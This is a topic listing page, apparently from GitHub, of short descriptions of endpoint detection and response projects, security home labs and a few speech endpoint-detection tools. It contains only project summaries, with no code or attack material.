Open-source cross-platform endpoint detection engine for Windows, macOS, and Linux using ETW, ESF, eBPF, Sigma, YARA, IOCs, and ECS NDJSON alerts.
-
Updated
Jul 4, 2026 - Rust
Open-source cross-platform endpoint detection engine for Windows, macOS, and Linux using ETW, ESF, eBPF, Sigma, YARA, IOCs, and ECS NDJSON alerts.
A complete speech segmentation system using Kaldi and x-vectors for voice activity detection (VAD) and speaker diarisation.
Step-by-step guide to deploying a Wazuh SIEM/SOC home lab using the official OVA covers hypervisor networking, memory optimization for low-RAM systems, dashboard access, SSL troubleshooting, and Windows endpoint agent deployment with full screenshots.
Experimental closed-loop EDR evaluation framework, automated artifact mutation, sandboxed execution, telemetry collection, and explainable triage. Understands why detections trigger. M.Sc. Cybersecurity thesis (EPFL, 2026).
"Python-based security tool for detecting suspicious processes"
Graph-powered EDR agent with LLM threat analysis, real-time IOC matching, and chain-aware response actions
On a scale of one to America, this NextGen Norton Antivirus EDR just made enterprise-grade defense free. Built by a Norton, carrying forward a name rooted in cybersecurity history, reimagined for modern threats.
Lightweight endpoint detection agent in Go. Process telemetry, YAML rule engine with name/cmdline/regex matching, JSON-lines alerts.
I implemented a speech endpoint detector that figures out where words start and stop, using short-term energy and zero-crossing rate. Works on Persian and English.
Free lightweight EDR for small teams. Monitor processes, files, and network. Detect threats with YAML rules. Web dashboard included.
Deployed Sysmon on Windows 10 with a custom XML ruleset to detect process creation, LOTL techniques, and encoded PowerShell execution via MITRE ATT&CK T1059.
Endpoint triage system for detecting suspicious activity using Python, MITRE ATT&CK mapping, and HTML threat reports.
Cross-platform vibe-coded (probably badly made but w.e) endpoint forensics suite. Dual SHA-256+SHA3-256 hash-chained. ML-DSA-65-signed evidence.
Collection of scripts for Fidelis CyberSecurity EDR
Linux kernel security: Rust eBPF probes, scalable telemetry (NDJSON/gRPC), MITRE ATT&CK detection-as-code, and Claude-powered SOAR triage tuned for ML workloads.
Add a description, image, and links to the endpoint-detection topic page so that developers can more easily learn about it.
To associate your repository with the endpoint-detection topic, visit your repo's landing page and select "manage topics."